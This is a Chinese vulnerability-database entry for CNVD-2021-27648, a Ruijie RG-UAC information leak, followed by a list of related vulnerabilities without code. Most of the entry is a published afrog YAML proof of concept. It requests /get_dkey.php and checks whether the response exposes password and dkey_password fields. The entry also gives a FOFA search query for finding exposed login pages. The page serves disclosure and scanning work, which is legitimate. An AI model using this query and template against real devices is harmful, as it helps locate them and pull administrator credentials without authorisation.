CNVD-2021-27648: Ruijie RG-UAC Information Leakage Vulnerability

日期: 2025-09-01 | 影响软件: RuijieRGUAC | POC: 已公开

漏洞描述

FOFA: title="RG-UAC登录页面" RUIJIE RG-UAC信息泄露

PoC代码[已公开]

id: CNVD-2021-27648

info:
    name: Ruijie RG-UAC Information Leakage Vulnerability
    author: doinb1517
    severity: critical
    verified: true
    description: |
        FOFA: title="RG-UAC登录页面"
        RUIJIE RG-UAC信息泄露
    reference:
      - https://www.cnvd.org.cn/flaw/show/CNVD-2021-27648
    tags: cnvd,cnvd2021,ruijie,leakage
    created: 2023/07/07

rules:
    r0:
      request:
          method: GET
          path: /get_dkey.php
      expression: |
        response.status == 200 && 
        response.body.bcontains(b'"password":') && 
        response.body.bcontains(b'"pre_define":') && 
        response.body.bcontains(b'"auth_method":') && 
        response.body.bcontains(b'"dkey_password":') 
expression: r0()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2021/CVE-2021-27648.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

SourceCodester Pet Grooming Management Software SQL注入漏洞 无POC

D-Link DIR-645 命令注入漏洞 无POC

LemonLDAP::NG 操作系统命令注入漏洞 无POC

万户OA informationmanager_upload.jsp 任意文件上传漏洞 无POC

万户OA freemarkeService 远程命令执行漏洞 无POC

SourceCodester Pet Grooming Management Software SQL注入漏洞无POC

D-Link DIR-645 命令注入漏洞无POC

LemonLDAP::NG 操作系统命令注入漏洞无POC

万户OA informationmanager_upload.jsp 任意文件上传漏洞无POC

万户OA freemarkeService 远程命令执行漏洞无POC